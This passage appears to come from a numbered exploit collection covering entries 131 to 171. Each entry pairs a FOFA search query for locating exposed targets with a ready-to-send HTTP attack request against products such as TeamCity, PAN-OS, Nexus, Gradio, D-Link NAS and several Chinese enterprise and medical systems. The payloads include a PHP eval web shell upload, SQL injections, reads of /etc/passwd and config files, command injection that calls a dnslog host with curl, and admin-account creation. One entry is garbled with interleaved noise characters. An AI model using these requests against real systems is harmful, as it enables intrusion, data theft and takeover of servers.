User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin

http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA: body="/public/qbsp.php"

POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"

POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"

GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA: title="NextChat"

GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"

GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"

GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"

GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA: body="指挥调度管理平台"

POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA: body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA: app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.

GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"

GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"

GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA: title="AJ-Report"

GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter

GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"

Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the resulting file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"

POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"

POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; so a vulnerable device returns the directory listing and the marker string.

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Verify: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

Entry 187 below lists a time-based payload for the same CVE.

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

(bufValue carries the file content and is omitted here; PAYLOAD stands in for it.)

Verify: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Unauthenticated; the path must be sent percent-encoded exactly as shown. Fixed in Nexus Repository 3.68.1.

161. KeyTop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"

Step 1: upload the file. <fileName> sets the file name (the ../ prefix walks out of the upload folder) and <fileFlow> carries the file content, base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file: http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Verify: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

The stored path is returned in the response body.

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传2 I( u9 _/ P! t8 B) m
FOFA: title="智慧综合管理平台登入"
9 m4 X7 `6 H& P+ G0 h) Y6 zPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( p' I; Z+ |0 \- k+ \+ z) e
Host: x.x.x.x
9 d7 a! ?# Q% x( x2 ~" t( TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) g# I1 B, @# d* }3 SContent-Length: 2881 E5 g/ r2 D4 Y; R% e
Accept: application/json, text/javascript, */*; q=0.018 u* ~% G7 P  ^3 W  G; V5 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,( X. G- V* g* i3 ]  d8 ~
Connection: close
. J, s3 e" O7 v5 A* [" X" M, d/ YContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl$ |  f+ H9 r' }: c  E
X-Requested-With: XMLHttpRequest
" b+ J. ~! Q& @1 s) y8 KAccept-Encoding: gzip
8 j9 t. ?" q5 v6 p' A3 x4 d1 G7 s- j3 d& Z0 i/ i# ?
------dqdaieopnozbkapjacdbdthlvtlyl$ u5 h! w* ~; q" s% v5 i. n# \
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"9 N% n5 u* D" _  l6 v. l
Content-Type: image/jpeg
' K3 S8 m; C4 e/ b+ U; ]* e# I" V
7 K0 g  U. Q! N1 l8 O6 v<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 A, q% K0 D; \$ O( t4 g8 g; I1 C------dqdaieopnozbkapjacdbdthlvtlyl--; @. T8 p5 m  K: y# R; D  ~) J

1 M$ H1 W* F# b( I1 f# x  J* V1 N. y, `& O7 `  N
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx# K. Y( _5 C; M

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

The injection point is the sortOrder parameter (boolean-based, MySQL).

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Error-based injection (MSSQL): the CHAR() sequence spells "hello", and a vulnerable host echoes it inside the conversion error message.

167. LVS Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Time-based blind injection (MSSQL WAITFOR DELAY): a vulnerable host answers about 5 seconds late. Send the path as-is; HTTP clients that normalise ../ before sending will not reproduce the request.

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"

